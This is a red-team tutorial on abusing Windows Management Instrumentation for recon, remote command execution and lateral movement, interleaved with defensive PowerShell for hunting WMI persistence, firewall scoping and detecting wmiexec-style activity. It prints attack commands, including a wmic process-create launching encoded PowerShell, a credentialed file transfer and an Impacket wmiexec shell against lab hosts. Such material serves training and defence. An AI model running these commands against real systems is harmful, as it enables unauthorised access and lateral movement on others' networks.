WMI

Windows Management Instrumentation (WMI) is a Microsoft technology designed to allow administrators to perform local and remote management operations across a network. Since WMI has been part of the Windows ecosystem since Windows 98, it can be used in almost every network, regardless of whether the hosts run Windows 10 or Windows XP. Some of the operations that can be performed via WMI are:

  • Command Execution
  • File Transfer
  • Read Files and Registry keys
  • File System Examination
  • Subscribe to Events

Red teams can exploit the functionality of WMI, and the fact that it works against a wide range of Windows systems, to perform host recon, execute commands, move laterally and establish persistence.
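The persistence use mentioned above relies on WMI event subscriptions ("Subscribe to Events"). As an added example, not code from the original post, the following PowerShell enumerates the permanent subscriptions registered on a host and shows what each would execute. It assumes the standard root\subscription namespace and, for a remote host, administrator rights there; the baseline binding it whitelists is the one Windows ships by default.

```powershell
# Added example (not from the original post): hunt for permanent WMI event
# subscriptions, the mechanism behind "Subscribe to Events" persistence.
# Queries the local host by default; -ComputerName reaches a remote host over
# WMI/DCOM and needs administrator rights on that host.
param(
    [string]$ComputerName = $env:COMPUTERNAME
)

$wmi = @{ Namespace = 'root\subscription'; ComputerName = $ComputerName; ErrorAction = 'Stop' }

# A persistent subscription is three objects: a filter (the WQL trigger),
# a consumer (the action) and a binding that joins the two.
# Querying the __EventConsumer base class returns every derived consumer type.
$filters   = @(Get-WmiObject @wmi -Class __EventFilter)
$consumers = @(Get-WmiObject @wmi -Class __EventConsumer)
$bindings  = @(Get-WmiObject @wmi -Class __FilterToConsumerBinding)

foreach ($binding in $bindings) {
    # Binding references are object paths such as  __EventFilter.Name="Foo" ;
    # pull the Name out and match it back to the filter/consumer instances.
    $filterName   = [regex]::Match($binding.Filter,   'Name="([^"]+)"').Groups[1].Value
    $consumerName = [regex]::Match($binding.Consumer, 'Name="([^"]+)"').Groups[1].Value
    $filter   = $filters   | Where-Object Name -eq $filterName   | Select-Object -First 1
    $consumer = $consumers | Where-Object Name -eq $consumerName | Select-Object -First 1

    # Only two consumer classes run arbitrary code; surface what they would execute.
    $payload = switch ($consumer.__CLASS) {
        'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
        'ActiveScriptEventConsumer' { $consumer.ScriptText }
        default                     { $null }
    }

    [pscustomobject]@{
        Computer      = $ComputerName
        FilterName    = $filterName
        FilterQuery   = $filter.Query
        ConsumerClass = $consumer.__CLASS
        ConsumerName  = $consumerName
        Payload       = $payload
        # Windows ships one benign binding by default: filter "SCM Event Log
        # Filter" bound to an NTEventLogEventConsumer. Anything else deserves review.
        Baseline      = ($filterName -eq 'SCM Event Log Filter')
    }
}
```

Run it as `.\Find-WmiSubscription.ps1 -ComputerName <host>` (the file name is an assumption) and review every row where Baseline is false; a CommandLineEventConsumer or ActiveScriptEventConsumer with a filter on process start, logon or a timer is the classic persistence shape. On PowerShell 7, where Get-WmiObject no longer exists, the same queries work with Get-CimInstance and a CIM session to the remote host.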

The WMI service uses either DCOM (TCP port 135) or the WinRM protocol (SOAP, TCP port 5985).

WMI Ports – DCOM and WinRM

It runs as SYSTEM, and administrator credentials are needed to use it. Since 2014 various publicly available tools can use WMI as a command and control channel.

WmiShell

WmiShell is a PowerShell script that is part of WmiSploit; it is based on the WMIShell that Andrei Dumitrescu developed in Python. The script uses WMI namespaces to execute commands.

Enter-WmiShell -ComputerName desktop-1st179m -UserName netbiosX

WmiShell – Command Execution

WmiSploit also contains a script which can execute PowerShell commands and scripts on the remote target, using WMI as the communication channel.

Invoke-WmiCommand -ComputerName desktop-1st179m -ScriptBlock {tasklist}

WmiSploit - Executing PowerShell Commands

 

WMImplant

Chris Truncer developed WMImplant, a PowerShell tool that leverages WMI to perform offensive operations. It can be used as a command and control tool with the benefit that it doesn't require an agent to be dropped on the target. However, administrator credentials are needed.

Import-Module .\WMImplant.ps1
Invoke-WMImplant

WMImplant – Execution

The capabilities of WMImplant are listed in the main menu once it is executed. It can perform file transfer operations, lateral movement and host recon.

WMImplant – Main Menu

The change_user command is required before any other command is executed, in order to provide the correct credentials for remote connections.

WMImplant – Authentication and Basic Recon

It is also possible to execute small PowerShell scripts on the target.

WMImplant – Execution of PowerShell Scripts

Additionally, like the WmiShell tool, it has shell functionality which can be triggered with the command_exec command, as below:

WMImplant – Shell Commands

File operations can also be performed remotely.

WMImplant – Directory Listing

WMIOps

Prior to WMImplant, Chris Truncer had developed WMIOps, which can be used to perform various actions against targets during red team assessments. Some of these actions include:

  • Transferring files
  • Starting processes
  • Killing processes
  • Folder Sharing

Even though its functionality is limited compared to WMImplant, it still implements the idea of executing commands and receiving output via WMI. The Invoke-ExecCommandWMI function has the ability to start a process remotely.

WMIOps – Start a Remote Process

Transferring files over WMI can be achieved with the following function. However, it needs local administrator credentials for both the remote and the local machine.

Invoke-FileTransferOverWMI -RemoteUser victimusername -RemotePass victimpassword -TARGETS 192.168.1.124 -File C:\Users\netbiosX\Desktop\WMImplant.ps1 -Download C:\Users\User\Downloads\WMI\WMImplant.ps1 -LocalUser Administrator -LocalPass pentestlab

Retrieving System Drive Information:

WMIOps – System Drive Information

WMIC (out of the box)

C:\Windows\system32>runas /netonly /user:htb\administrator "cmd.exe"
Enter the password for htb\administrator:
Attempting to start cmd.exe as user "htb\administrator" ...
=> C:\Windows\system32>wmic /node:192.168.178.10 computersystem list brief /format:list
   Domain=HTB.LOCAL
   Manufacturer=innotek GmbH
   Model=VirtualBox
   Name=PUCKIE
   PrimaryOwnerName=Windows User
   TotalPhysicalMemory=2147012608
=> C:\Windows\system32>wmic /node:192.168.178.10 path win32_loggedonuser get antecedent
   Antecedent
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="IUSR"
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="SYSTEM"
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="LOCAL SERVICE"
   \\.\root\cimv2:Win32_Account.Domain="PUCKIE",Name="NETWORK SERVICE"
   \\.\root\cimv2:Win32_Account.Domain="HTB",Name="hillie"
   \\.\root\cimv2:Win32_Account.Domain="HTB",Name="Administrator"

 

C:\Windows\system32>wmic /node:192.168.178.10 path win32_process call create "powershell -noP -sta -w 1 -enc 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"

Conclusion

Utilizing WMI for host recon and lateral movement can allow the red team to stay hidden and exfiltrate information. The fact that WMI doesn't need a binary to be dropped in order to retrieve information, and that the majority of blue teams don't monitor WMI activity, can eliminate the risk of being discovered. It is therefore necessary, where WMI cannot be completely disabled, to filter traffic to ports 135 and 5985 as needed.
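The filtering recommended above can be done on the host itself. As an added example, not from the original post, the following PowerShell scopes the two WMI entry points named in the post, DCOM/RPC on TCP 135 and WinRM on TCP 5985, to a management subnet using Windows Defender Firewall. The subnet, rule names and the use of the Domain profile are assumptions to adjust for your environment.

```powershell
# Added example (not from the original post): restrict inbound WMI endpoints
# (DCOM/RPC on 135, WinRM on 5985) to a management subnet instead of disabling
# WMI outright. Subnet and rule names are assumptions; run from an elevated
# console with local access in case a rule cuts off your remote session.
$ManagementNet = '10.10.0.0/24'   # assumed jump-host/management range

# 1. Default-deny inbound so that only explicit allow rules open anything.
Set-NetFirewallProfile -Profile Domain, Private, Public -DefaultInboundAction Block

# 2. Disable the built-in groups that allow WMI and WinRM from any source.
#    Windows Firewall evaluates block rules before allow rules, so a broad
#    "block 135" rule would also defeat the scoped allows below; the workable
#    pattern is to remove the broad allows and rely on default-deny.
Disable-NetFirewallRule -DisplayGroup 'Windows Management Instrumentation (WMI)'
Disable-NetFirewallRule -DisplayGroup 'Windows Remote Management'

# 3. Re-allow only from the management subnet. WMI over DCOM first contacts
#    the RPC endpoint mapper on 135 and is then redirected to a dynamic RPC
#    port, so both the mapper (LocalPort RPCEPMap) and the dynamic range
#    (LocalPort RPC) must be scoped, not just port 135.
$allow = @{ Direction = 'Inbound'; Protocol = 'TCP'; RemoteAddress = $ManagementNet
            Action = 'Allow'; Profile = 'Domain' }
New-NetFirewallRule @allow -DisplayName 'WMI: RPC endpoint mapper (mgmt only)' -LocalPort RPCEPMap
New-NetFirewallRule @allow -DisplayName 'WMI: dynamic RPC (mgmt only)'        -LocalPort RPC
New-NetFirewallRule @allow -DisplayName 'WinRM HTTP/HTTPS (mgmt only)'        -LocalPort 5985, 5986

# 4. Verify: every enabled inbound rule touching these ports, with its scope.
Get-NetFirewallRule -Direction Inbound -Enabled True |
    Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -match '^(135|5985|5986|RPC|RPCEPMap)$' } |
    ForEach-Object {
        [pscustomobject]@{
            Rule          = $_.DisplayName
            LocalPort     = (($_ | Get-NetFirewallPortFilter).LocalPort -join ',')
            RemoteAddress = (($_ | Get-NetFirewallAddressFilter).RemoteAddress -join ',')
            Action        = $_.Action
        }
    }
```

The verification step should show only the three scoped rules; any remaining rule with RemoteAddress "Any" on these ports is a gap. Note that the wmiexec session on the page also negotiates SMB ("SMBv3.0 dialect used") to collect command output, so TCP 445 deserves the same scoping if that tool is in scope for the assessment.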

root@kali:~/htb/puckie# python wmiexec.py Administrator:Passw0rd1@192.168.178.10
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
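Both remote-execution paths shown on this page leave a recognisable process-creation trail: Win32_Process.Create (the wmic call in the WMIC section) spawns the new process under WmiPrvSE.exe, and the wmiexec session above collects output by redirecting it into the ADMIN$ share. As an added example, not code from the original post, the following PowerShell turns those two observations, plus the "-enc" PowerShell launch the page shows, into a rule evaluated over Sysmon event ID 1 fields. The function names and the two sample records are constructed for the example.

```powershell
# Added example (not from the original post): flag process creations that look
# like remote WMI execution. Field names follow Sysmon event ID 1.
function Test-WmiSpawnedProcess {
    param(
        # Hashtable with Sysmon-style keys: Image, ParentImage, CommandLine, User
        [Parameter(Mandatory)][hashtable]$Record
    )
    $reasons = @()
    # Win32_Process.Create runs the child under the WMI provider host.
    if ($Record.ParentImage -match '\\WmiPrvSE\.exe$') {
        $reasons += 'parent is WmiPrvSE.exe (Win32_Process.Create)'
    }
    # impacket wmiexec.py redirects output to \\127.0.0.1\ADMIN$\__<timestamp>.
    if ($Record.CommandLine -match '\\\\127\.0\.0\.1\\ADMIN\$\\__') {
        $reasons += 'output redirected into ADMIN$ share (wmiexec-style)'
    }
    # The page's payload is launched with "powershell ... -enc <base64>".
    if ($Record.CommandLine -match '(?i)powershell.*\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}') {
        $reasons += 'base64-encoded PowerShell command'
    }
    [pscustomobject]@{
        User        = $Record.User
        Image       = $Record.Image
        ParentImage = $Record.ParentImage
        CommandLine = $Record.CommandLine
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = ($reasons -join '; ')
    }
}

# Turn a Sysmon event record from Get-WinEvent into the hashtable the rule expects.
function ConvertFrom-SysmonEvent {
    param([Parameter(Mandatory, ValueFromPipeline)]$WinEvent)
    process {
        $xml = [xml]$WinEvent.ToXml()
        $fields = @{}
        foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
        $fields
    }
}

# Live query (needs Sysmon with process-creation logging); not run by default.
function Get-WmiSpawnedProcess {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ConvertFrom-SysmonEvent |
        ForEach-Object { Test-WmiSpawnedProcess -Record $_ } |
        Where-Object Suspicious
}

# Constructed sample records (not real telemetry) so the rule runs offline.
$samples = @(
    @{ User = 'HTB\Administrator'; Image = 'C:\Windows\System32\cmd.exe'
       ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
       CommandLine = 'cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1538383883.09 2>&1' },
    @{ User = 'HTB\hillie'; Image = 'C:\Windows\System32\notepad.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = '"C:\Windows\System32\notepad.exe"' }
)
$samples | ForEach-Object { Test-WmiSpawnedProcess -Record $_ } | Where-Object Suspicious
```

Only the first sample is reported, with both the WmiPrvSE.exe parent and the ADMIN$ redirect as reasons. Without Sysmon, Security event 4688 on Windows 10 / Server 2016 and later carries the same parent-process name and (when command-line auditing is enabled) the command line, so the rule can be fed from there. A WmiPrvSE.exe parent on its own is not proof of intrusion: management agents and inventory tools create processes the same way, so baseline which users and source hosts normally do this before alerting.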

 

Resources

(c) 2018